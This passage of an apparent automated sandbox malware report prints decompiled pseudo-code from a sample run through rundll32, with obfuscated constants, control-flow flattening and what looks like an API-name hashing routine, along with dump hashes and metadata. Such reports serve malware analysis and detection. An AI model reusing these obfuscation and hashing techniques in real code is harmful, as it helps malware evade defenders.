                                                                                                                    							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
                                                                                                                    							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
                                                                                                                    						} while (_t88 < _t86);
                                                                                                                    						_t60 =  *(_t91 + 0x18);
                                                                                                                    					}
                                                                                                                    					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
                                                                                                                    				}
                                                                                                                    				return _t60;
                                                                                                                    			}




















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: g|E
                                                                                                                    • API String ID: 0-3824901942
                                                                                                                    • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                    • Instruction ID: 268ccf6a530b7e1814d91c43a2f12000a3172d6705ae434689c4598abd76a48b
                                                                                                                    • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                    • Instruction Fuzzy Hash: 9F3181766083118FC714DF19C48145BF7E0FF88318F424B6EE889AB251D774EA09CB96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E003351BB() {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				intOrPtr _v32;
                                                                                                                    				void* _t72;
                                                                                                                    				intOrPtr _t83;
                                                                                                                    				signed int _t87;
                                                                                                                    				signed int _t88;
                                                                                                                    				signed int _t89;
                                                                                                                    
                                                                                                                    				_v28 = _v28 & 0x00000000;
                                                                                                                    				_v32 = 0x54cf7d;
                                                                                                                    				_v16 = 0x3835ff;
                                                                                                                    				_v16 = _v16 >> 0xa;
                                                                                                                    				_v16 = _v16 * 0x17;
                                                                                                                    				_v16 = _v16 ^ 0x00095bb8;
                                                                                                                    				_t72 = 0xe98fb1d;
                                                                                                                    				_v24 = 0x583681;
                                                                                                                    				_t87 = 0x44;
                                                                                                                    				_v24 = _v24 / _t87;
                                                                                                                    				_v24 = _v24 ^ 0x000eb9f7;
                                                                                                                    				_v12 = 0x832b1f;
                                                                                                                    				_v12 = _v12 << 5;
                                                                                                                    				_v12 = _v12 | 0x242a8544;
                                                                                                                    				_v12 = _v12 ^ 0x346a2866;
                                                                                                                    				_v8 = 0x6a77bb;
                                                                                                                    				_v8 = _v8 >> 0xe;
                                                                                                                    				_t88 = 0x19;
                                                                                                                    				_v8 = _v8 / _t88;
                                                                                                                    				_v8 = _v8 ^ 0x9d9369f0;
                                                                                                                    				_v8 = _v8 ^ 0x9d908f3a;
                                                                                                                    				_v20 = 0x4802c8;
                                                                                                                    				_t89 = 0x21;
                                                                                                                    				_v20 = _v20 / _t89;
                                                                                                                    				_v20 = _v20 + 0xffffbfc3;
                                                                                                                    				_v20 = _v20 ^ 0x000df493;
                                                                                                                    				do {
                                                                                                                    					while(_t72 != 0x9835b86) {
                                                                                                                    						if(_t72 == 0xe98fb1d) {
                                                                                                                    							_push(_t72);
                                                                                                                    							_push(_t72);
                                                                                                                    							 *0x353e04 = E00337FF2(0x134);
                                                                                                                    							_t72 = 0x9835b86;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						goto L5;
                                                                                                                    					}
                                                                                                                    					_t83 =  *0x353e04; // 0x0
                                                                                                                    					E00340001(_v8, _t83 + 0x18, _v20);
                                                                                                                    					_t72 = 0x7dce4e4;
                                                                                                                    					L5:
                                                                                                                    				} while (_t72 != 0x7dce4e4);
                                                                                                                    				return 1;
                                                                                                                    			}
















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: f(j4
                                                                                                                    • API String ID: 0-3086030595
                                                                                                                    • Opcode ID: cad2a4074121ee73dd891200ca9231f0eb50a469cb00c98be246b26cd15ed947
                                                                                                                    • Instruction ID: 866edc9a4cbb2f397eca8f28fa56cf33e52b2cf444855d851d62186532b81edd
                                                                                                                    • Opcode Fuzzy Hash: cad2a4074121ee73dd891200ca9231f0eb50a469cb00c98be246b26cd15ed947
                                                                                                                    • Instruction Fuzzy Hash: BC314771E01219ABCF09DFAAD9855EEBBB1FB84324F208599E505AB250D3B45F45CF80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00332051(void* __edx, signed int _a4, intOrPtr _a8) {
                                                                                                                    				intOrPtr _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				void* _t71;
                                                                                                                    				signed int _t78;
                                                                                                                    				signed int _t80;
                                                                                                                    				signed int _t83;
                                                                                                                    				signed int _t92;
                                                                                                                    				signed int _t95;
                                                                                                                    				signed short* _t97;
                                                                                                                    
                                                                                                                    				_push(_a8);
                                                                                                                    				_t97 = _a4;
                                                                                                                    				_push(_t97);
                                                                                                                    				E003420B9(_t71);
                                                                                                                    				_v16 = 0x71ca23;
                                                                                                                    				_v12 = 0x57f692;
                                                                                                                    				_v8 = 0;
                                                                                                                    				_v4 = 0;
                                                                                                                    				_v20 = 0xd3252c;
                                                                                                                    				_v20 = _v20 + 0x4351;
                                                                                                                    				_v20 = _v20 + 0xffff5b79;
                                                                                                                    				_v20 = _v20 ^ 0x00d2c3f6;
                                                                                                                    				_a4 = 0xbb067e;
                                                                                                                    				_t83 = 0x11;
                                                                                                                    				_a4 = _a4 / _t83;
                                                                                                                    				_a4 = _a4 >> 8;
                                                                                                                    				_a4 = _a4 ^ 0xac5d3832;
                                                                                                                    				_a4 = _a4 ^ 0xac5d3334;
                                                                                                                    				_a4 = 0xab60c2;
                                                                                                                    				_a4 = _a4 << 0x10;
                                                                                                                    				_a4 = _a4 ^ 0x910d5570;
                                                                                                                    				_a4 = _a4 >> 4;
                                                                                                                    				_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                    				if( *_t97 != 0) {
                                                                                                                    					do {
                                                                                                                    						_t80 = _v20;
                                                                                                                    						_a4 = 0xbb067e;
                                                                                                                    						_a4 = _a4 / _t83;
                                                                                                                    						_a4 = _a4 >> 8;
                                                                                                                    						_a4 = _a4 ^ 0xac5d3832;
                                                                                                                    						_a4 = _a4 ^ 0xac5d3334;
                                                                                                                    						_a4 = 0xab60c2;
                                                                                                                    						_a4 = _a4 << 0x10;
                                                                                                                    						_a4 = _a4 ^ 0x910d5570;
                                                                                                                    						_a4 = _a4 >> 4;
                                                                                                                    						_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                    						_t92 = _v20 << _a4;
                                                                                                                    						_t78 =  *_t97 & 0x0000ffff;
                                                                                                                    						_t95 = _v20 << _a4;
                                                                                                                    						if(_t78 >= 0x41 && _t78 <= 0x5a) {
                                                                                                                    							_t78 = _t78 + 0x20;
                                                                                                                    						}
                                                                                                                    						_v20 = _t78;
                                                                                                                    						_t97 =  &(_t97[1]);
                                                                                                                    						_v20 = _v20 + _t92;
                                                                                                                    						_v20 = _v20 + _t95;
                                                                                                                    						_v20 = _v20 - _t80;
                                                                                                                    						_t83 = 0x11;
                                                                                                                    					} while ( *_t97 != 0);
                                                                                                                    				}
                                                                                                                    				return _v20;
                                                                                                                    			}















                                                                                                                    0x0033214b
                                                                                                                    0x00332153
                                                                                                                    0x0033215d
                                                                                                                    0x00332160
                                                                                                                    0x00332165
                                                                                                                    0x0033216c
                                                                                                                    0x0033216c
                                                                                                                    0x0033216f
                                                                                                                    0x00332173
                                                                                                                    0x00332176
                                                                                                                    0x0033217a
                                                                                                                    0x0033217e
                                                                                                                    0x00332184
                                                                                                                    0x00332185
                                                                                                                    0x0033218f
                                                                                                                    0x00332199

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: QC
                                                                                                                    • API String ID: 0-229404352
                                                                                                                    • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                    • Instruction ID: 289d63a746fa5c95427ce5b5021f800907c0ac9a7ea9d79ad27eba592b44051c
                                                                                                                    • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                    • Instruction Fuzzy Hash: 533117719083818BD315DF29C48905BBBE0FFC87A8F558E1DF4C9A6225D3B4C688CB56
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034176B(void* __ecx, void* __eflags) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				intOrPtr _v40;
                                                                                                                    				signed int _t87;
                                                                                                                    				signed int _t91;
                                                                                                                    				signed int _t92;
                                                                                                                    				signed int _t93;
                                                                                                                    				void* _t102;
                                                                                                                    				signed int _t103;
                                                                                                                    
                                                                                                                    				_v36 = _v36 & 0x00000000;
                                                                                                                    				_v40 = 0x355323;
                                                                                                                    				_v24 = 0x6eb9b5;
                                                                                                                    				_v24 = _v24 + 0x6c21;
                                                                                                                    				_t102 = __ecx;
                                                                                                                    				_t91 = 0x64;
                                                                                                                    				_v24 = _v24 / _t91;
                                                                                                                    				_v24 = _v24 ^ 0x0005c519;
                                                                                                                    				_v32 = 0xba69a0;
                                                                                                                    				_v32 = _v32 << 7;
                                                                                                                    				_v32 = _v32 ^ 0x5d3c95d0;
                                                                                                                    				_v20 = 0x99612d;
                                                                                                                    				_v20 = _v20 | 0x6bf7bfaf;
                                                                                                                    				_v20 = _v20 + 0x66ac;
                                                                                                                    				_v20 = _v20 ^ 0x6c036c89;
                                                                                                                    				_v16 = 0xd72900;
                                                                                                                    				_v16 = _v16 + 0xffff2462;
                                                                                                                    				_v16 = _v16 ^ 0xa7b97bfd;
                                                                                                                    				_v16 = _v16 + 0xffff7578;
                                                                                                                    				_v16 = _v16 ^ 0xa76084ba;
                                                                                                                    				_v12 = 0xeb6610;
                                                                                                                    				_t92 = 0x6f;
                                                                                                                    				_v12 = _v12 / _t92;
                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                    				_v12 = _v12 ^ 0x2e835447;
                                                                                                                    				_v12 = _v12 ^ 0x21f4cf0c;
                                                                                                                    				_v28 = 0x644f8d;
                                                                                                                    				_v28 = _v28 << 3;
                                                                                                                    				_v28 = _v28 << 0xa;
                                                                                                                    				_v28 = _v28 ^ 0x89f1a004;
                                                                                                                    				_v8 = 0xbb77ef;
                                                                                                                    				_t93 = 0x72;
                                                                                                                    				_v8 = _v8 * 0x3c;
                                                                                                                    				_v8 = _v8 / _t93;
                                                                                                                    				_v8 = _v8 << 6;
                                                                                                                    				_v8 = _v8 ^ 0x18aaba50;
                                                                                                                    				_t87 = E00340AE0(_v8, _v28);
                                                                                                                    				_push(_v12);
                                                                                                                    				_t103 = _t87;
                                                                                                                    				_push(_t102);
                                                                                                                    				_push(_t103);
                                                                                                                    				_push(3);
                                                                                                                    				E003380E3(_v20, _v16);
                                                                                                                    				 *((short*)(_t102 + _t103 * 2)) = 0;
                                                                                                                    				return 0;
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #S5
                                                                                                                    • API String ID: 0-40889119
                                                                                                                    • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                    • Instruction ID: 3af9c5b45d63f169d198d2bb7e2e579113aa2602f23acf945d2f33c2b3fe8a08
                                                                                                                    • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                    • Instruction Fuzzy Hash: EA3133B2D0020AEBCB48DFE5C54AAEEBBB1FB44304F208099D515B6250D7B51B15CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E003509B5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				char _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				intOrPtr _v44;
                                                                                                                    				intOrPtr _v48;
                                                                                                                    				intOrPtr _v52;
                                                                                                                    				signed int _t77;
                                                                                                                    				signed int _t88;
                                                                                                                    				signed int _t89;
                                                                                                                    
                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                    				_v32 = 4;
                                                                                                                    				_v52 = 0xab6069;
                                                                                                                    				_v48 = 0xcf1f96;
                                                                                                                    				_v44 = 0x29044d;
                                                                                                                    				_v24 = 0xea6416;
                                                                                                                    				_v24 = _v24 | 0x7adbff7d;
                                                                                                                    				_v24 = _v24 ^ 0x5afbff7f;
                                                                                                                    				_v16 = 0x725236;
                                                                                                                    				_v16 = _v16 + 0xffff3c91;
                                                                                                                    				_v16 = _v16 << 7;
                                                                                                                    				_t88 = 0x2b;
                                                                                                                    				_v16 = _v16 / _t88;
                                                                                                                    				_v16 = _v16 ^ 0x015653a2;
                                                                                                                    				_v12 = 0xbf3984;
                                                                                                                    				_v12 = _v12 ^ 0x457d3893;
                                                                                                                    				_t89 = 0x44;
                                                                                                                    				_v12 = _v12 / _t89;
                                                                                                                    				_v12 = _v12 + 0x25bc;
                                                                                                                    				_v12 = _v12 ^ 0x0106bc10;
                                                                                                                    				_v20 = 0xd655eb;
                                                                                                                    				_v20 = _v20 | 0x2344b0aa;
                                                                                                                    				_v20 = _v20 * 0x16;
                                                                                                                    				_v20 = _v20 ^ 0x147fb4df;
                                                                                                                    				_v8 = 0x70d8dc;
                                                                                                                    				_v8 = _v8 + 0xe534;
                                                                                                                    				_v8 = _v8 ^ 0xb5155b0d;
                                                                                                                    				_v8 = _v8 >> 7;
                                                                                                                    				_v8 = _v8 ^ 0x01640b3f;
                                                                                                                    				_v28 = 0x2d9f47;
                                                                                                                    				_v28 = _v28 + 0xffffba71;
                                                                                                                    				_v28 = _v28 ^ 0x002c2593;
                                                                                                                    				_t77 = E003394EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
                                                                                                                    				asm("sbb eax, eax");
                                                                                                                    				return  ~_t77 & _v36;
                                                                                                                    			}



















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Rr
                                                                                                                    • API String ID: 0-3911282678
                                                                                                                    • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                    • Instruction ID: aa369f70871c2a83a6adede1090f4de1626a3b026dd01c03583cc8ccc2b0eed9
                                                                                                                    • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                    • Instruction Fuzzy Hash: 3A31E1B1D1021EEBDB04CFA6C94A9EEFBB5FB44318F108599D121B6250D3B85B49CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00348519(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				void* _t55;
                                                                                                                    
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t55);
                                                                                                                    				_v8 = 0x519131;
                                                                                                                    				_v8 = _v8 ^ 0xec4619ea;
                                                                                                                    				_v8 = _v8 + 0x48c3;
                                                                                                                    				_v8 = _v8 ^ 0x9760daa2;
                                                                                                                    				_v8 = _v8 ^ 0x7b7f7884;
                                                                                                                    				_v16 = 0xb689a0;
                                                                                                                    				_v16 = _v16 + 0x133d;
                                                                                                                    				_v16 = _v16 ^ 0x00b72bb6;
                                                                                                                    				_v12 = 0xec38eb;
                                                                                                                    				_v12 = _v12 * 0x68;
                                                                                                                    				_v12 = _v12 | 0x70f3e2c1;
                                                                                                                    				_v12 = _v12 + 0xd290;
                                                                                                                    				_v12 = _v12 ^ 0x7ff36ca2;
                                                                                                                    				_v12 = 0x452aa4;
                                                                                                                    				_v12 = _v12 ^ 0xbb670255;
                                                                                                                    				_v12 = _v12 >> 1;
                                                                                                                    				_v12 = _v12 * 0x2d;
                                                                                                                    				_v12 = _v12 ^ 0x7280165f;
                                                                                                                    				_v24 = 0xb68a33;
                                                                                                                    				_v24 = _v24 + 0xffff2941;
                                                                                                                    				_v24 = _v24 ^ 0x00b92c3b;
                                                                                                                    				_v12 = 0x340add;
                                                                                                                    				_v12 = _v12 | 0xd5e1d7f7;
                                                                                                                    				_v12 = _v12 ^ 0xd5f6168b;
                                                                                                                    				_v20 = 0x853d17;
                                                                                                                    				_v20 = _v20 + 0xcd4d;
                                                                                                                    				_v20 = _v20 ^ 0x00837917;
                                                                                                                    				return E0033A30C(_v12, _a4, E00331DB9(__ecx), _v20);
                                                                                                                    			}










                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8
                                                                                                                    • API String ID: 0-719543824
                                                                                                                    • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                    • Instruction ID: 80a4a72d3515bc1bdd05ce68c650cfc2bd5deffa9b91bf86d2451ecc685c90c6
                                                                                                                    • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                    • Instruction Fuzzy Hash: 6A21B2B6C00209EBCF49DFE5CA8689EBFB5FF40318F608189E411BA261D3B54B54DB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                    • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                    • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                    • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                    • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                    • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                    • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                    • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                    • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00334346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                    				signed int _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				char _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				void* _t146;
                                                                                                                    				void* _t165;
                                                                                                                    				signed int _t170;
                                                                                                                    				signed int _t171;
                                                                                                                    				signed int _t172;
                                                                                                                    				signed int _t173;
                                                                                                                    				signed int _t174;
                                                                                                                    				void* _t177;
                                                                                                                    				intOrPtr* _t196;
                                                                                                                    				void* _t197;
                                                                                                                    				signed int* _t200;
                                                                                                                    
                                                                                                                    				_push(_a8);
                                                                                                                    				_t196 = __ecx;
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t146);
                                                                                                                    				_v8 = 0x1587dd;
                                                                                                                    				_t200 =  &(( &_v72)[4]);
                                                                                                                    				_t197 = 0;
                                                                                                                    				_v4 = _v4 & 0;
                                                                                                                    				_t177 = 0x762b00a;
                                                                                                                    				_v40 = 0x54d1b5;
                                                                                                                    				_t170 = 0x79;
                                                                                                                    				_v40 = _v40 / _t170;
                                                                                                                    				_v40 = _v40 ^ 0x0000b372;
                                                                                                                    				_v16 = 0xa1afdd;
                                                                                                                    				_v16 = _v16 >> 0xd;
